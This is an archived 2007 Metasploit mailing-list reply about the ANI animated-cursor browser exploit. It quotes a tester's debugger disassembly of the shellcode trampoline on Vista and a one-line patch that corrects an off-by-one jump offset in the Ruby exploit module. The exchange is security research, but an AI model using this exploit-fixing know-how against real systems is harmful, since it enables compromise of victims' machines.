Metasploit mailing list archives

Metasploit vs ANI

From: mmiller at hick.org (mmiller at hick.org)
Date: Mon, 2 Apr 2007 13:40:28 -0700

On Mon, Apr 02, 2007 at 10:32:54PM +0200, Nicolas RUFF wrote:

To HDM and Rhys: thanks for your explanations on the style sheet trick -
I missed this one. There *is* a second connection to get the ANI file.

However, I still feel like there is a bug somewhere. My victim is Vista
32-bit English. I attached Olly to IEXPLORE and an access violation is
triggered in the following block (which is clearly a GetEIP):

02C80EF3   EB 0F                 JMP SHORT 02C80F04
02C80EF5   68 BC040000           PUSH 4BC
02C80EFA   59                    POP ECX
02C80EFB   5E                    POP ESI
02C80EFC   29CC                  SUB ESP,ECX
02C80EFE   89E7                  MOV EDI,ESP
02C80F00   F3:A4                 REP MOVS BYTE PTR ES:[EDI],BYTE PTR
DS:[ESI]
02C80F02   FFE4                  JMP ESP
02C80F04                         CALL 02C80EF5

This memory block belongs to:
\Device\HarddiskVolume1\Users\[...]\Temporary Internet
Files\Low\Content.IE5\BUURI5IQ\hMNjttkPdyba3xhJwbZa9FrbHegyoRkUeMVg74rfMvIceIwheWHyaB7zWJNzWKe5VoXHAAU47[1].zip

*However*, EIP value is 02C80EF4, so the sequence of bytes is
interpreted as PUNPCKHBW instruction (nice one :). If I manually set EIP
to 02C80EF3, exploit works fine.

There is some kind of "one-by-one" in the jump address - looks like you
0xCC'ed something :)


Thanks for the report, Nicolas.  I think you're right (although it's
pretty weird that this worked in my test environment).  

I'm not in a place to test this, but can you try this patch out and see if it
fixes the problem for you:

===================================================================
--- ani_loadimage_chunksize.rb  (revision 4626)
+++ ani_loadimage_chunksize.rb  (working copy)
@@ -283,7 +283,7 @@     
                        
                        # Replace the operand to the relative jump to point into the actual
                        # payload itself which comes after the riff chunk
-                       riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
+                       riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V')
                end
                
                # Place the RIFF chunk in front and off we go

Current thread:

Metasploit vs ANI H D Moore (Apr 02)
- Metasploit vs ANI Nicolas RUFF (Apr 02)
  - Metasploit vs ANI Saad Kadhi (Apr 02)
  - Metasploit vs ANI H D Moore (Apr 02)
    - Metasploit vs ANI Nicolas RUFF (Apr 02)
    - Metasploit vs ANI mmiller at hick.org (Apr 02)
    - Metasploit vs ANI H D Moore (Apr 02)
    - Metasploit vs ANI Giorgio Casali (Apr 03)
    - Metasploit vs ANI Thomas Werth (Apr 03)
    - Metasploit vs ANI mmiller at hick.org (Apr 03)
    - Metasploit vs ANI Thomas Werth (Apr 03)
    - Metasploit vs ANI mmiller at hick.org (Apr 03)
    - Metasploit vs ANI Thomas Werth (Apr 03)
    - Metasploit vs ANI mmiller at hick.org (Apr 04)
    - Metasploit vs ANI Thomas Werth (Apr 04)
    - Metasploit vs ANI H D Moore (Apr 04)

(Thread continues...)